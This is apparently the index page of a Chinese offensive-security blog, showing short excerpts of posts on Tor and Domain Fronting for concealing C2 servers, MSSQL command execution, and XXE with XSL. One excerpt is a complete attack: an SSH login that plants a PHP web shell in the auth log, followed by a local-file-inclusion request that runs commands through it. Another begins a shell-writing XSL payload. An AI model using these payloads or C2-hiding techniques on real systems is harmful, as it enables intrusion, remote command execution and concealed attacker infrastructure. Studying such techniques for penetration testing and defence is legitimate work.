文章第一时间发布在www.4hou.com。文章已授权嘶吼独家发布,未经许可禁止转载,如若转载请联系嘶吼编辑 0x01 简介 学习完Domain Fronting之后,又从@vysecurity的文章里学会了一个新的姿势--Tor Fronting,使用Tor Fro...

Continue reading

0x01 简介 最近看到了一些关于Domain Fronting的技术,感觉很有意思,其特点在于,你真正访问的域名并不是你看到的域名,即可以隐藏攻击者的真实地址,并且此技术能够让我们在一些受限制的网络中依然连接到我们的C2服务器,其关键思想是在不同的通信层使用不同的域名,...

Continue reading

LFI SSH日志

in 奇技淫巧 read (919)

登陆SSH: ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105 包含文件: http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls

Continue reading

0x00 简介 渗透测试过程中,大家经常会碰到通过MSSQL来进行提权或执行系统命令之类的操作,通常我们经常会使用xp_cmdshell来进行执行系统命令,但是当xp_cmdshell不能使用的时候,我们还有什么别的方式么?本文将介绍与分享一下我自己学到的一些姿势。 0x...

Continue reading

XXE with XSL

in 奇技淫巧 read (849)

当XXE支持XSL时,可以直接执行命令: 写shell <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999...

Continue reading

Evi1cg

The way to be safe is never to be secure !